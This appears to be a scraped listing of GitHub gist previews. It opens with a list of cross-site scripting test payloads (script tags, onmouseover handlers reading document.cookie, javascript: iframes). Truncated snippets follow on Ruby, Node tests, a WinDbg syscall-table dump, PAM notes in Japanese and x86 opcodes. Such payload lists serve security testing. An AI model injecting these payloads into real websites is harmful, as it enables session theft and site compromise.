'';!--"<XSS>=&{()}``\"
<script>alert(XSS);</script>
"><script>alert(XSS);</script>
<ScrIpt>alert(1);</SCript>
<a onmouseover="alert(document.cookie)">XSS</a>
<a onmouseover=alert(document.cookie)>XSS</a>
<<script>alert("XSS");//<</script>
<iframe src="javascript:alert('XSS');"></iframe>
<iframe src=# onmouseover="alert(document.cookie)"></iframe>
- ``
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
A = [ | |
['6','千夜'] | |
['7','シャロ'] | |
['8','リゼ'] | |
['9','ココア'] | |
['0','チノ'] | |
[] | |
['i','青山'] | |
['o','マヤ'] | |
['p','メグ'] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# encoding utf-8 | |
# example: | |
# ruby ぴょんぴょん.rb -e png -e jpg -e gif -t シャロ -t チノ | |
# : .png or .jpg or .gif, シャロ or チノ | |
# ruby ぴょんぴょん.rb -o リゼシャロ --tag シャロ リゼ -千夜 | |
# : シャロ and リゼ but 千夜, ./リゼシャロ/ will contain symlinks | |
require 'fileutils' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var path = require('path'); | |
var Nightmare = require('nightmare'); | |
var should = require('chai').should(); | |
describe('Nightmare demo', function () { | |
this.timeout(15000); // Set timeout to 15 seconds, instead of the original 2 seconds | |
var url = 'http://localhost:3000'; | |
describe('Start page', function () { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
399 http://localhost:80 | |
146 http://localhost:3000 | |
87 http://localhost:8080 | |
32 http://localhost:8000 | |
27 http://localhost:631 | |
25 http://localhost:5000 | |
24 http://localhost:8888 | |
23 http://localhost:4567 | |
13 http://localhost:4000 | |
12 http://localhost:9292 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2.7 | |
# | |
# Usage: ./asm.py foo.s > foo.out | |
import sys, re | |
filename = sys.argv[1] | |
def parse(line): | |
line = line.strip() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
kd> .for(r $t0=0; @$t0<dwo(nt!KiServiceLimit); r $t0=@$t0+1){.printf "%y\n", nt!KiServiceTable+(dwo(nt!KiServiceTable+@$t0*4)>>4)} | |
fffff801`85aa38c4 | |
fffff801`85b3cc10 | |
nt!NtAcceptConnectPort (fffff801`75f238ac) | |
nt!NtMapUserPhysicalPagesScatter (fffff801`760afb54) | |
nt!NtWaitForSingleObject (fffff801`75e52d20) | |
fffff801`85ba51a0 | |
nt!NtReadFile (fffff801`75eb42f0) | |
nt!NtDeviceIoControlFile (fffff801`75e56740) | |
nt!NtWriteFile (fffff801`75e9e770) |
- Pluggable Authentication Module
- 認証処理を行うモジュール群とそれを利用するためのAPIからなるユーザー認証システム
- http://www.linux-pam.org/ のドキュメントでは認証処理を行うモジュールをLinux-PAM Module、APIを利用するアプリケーションをLinux-PAM Applicationと呼んでいる
Chapter 6. A reference guide for available modules
linuxでログインするとき/etc/passwdや/etc/shadowを見て認証を行う
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
06 push es 独立語 | |
07 pop es 独立語 | |
0え push cs 独立語 | |
16 push ss 独立語 | |
17 pop ss 独立語 | |
1え push ds 独立語 | |
1f pop ds 独立語 | |
27 daa 独立語 | |
2f das 独立語 | |
37 aaa 独立語 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
int main() | |
{ | |
char *s; | |
switch (getchar()) { | |
do { | |
case '0': | |
s = "zero"; |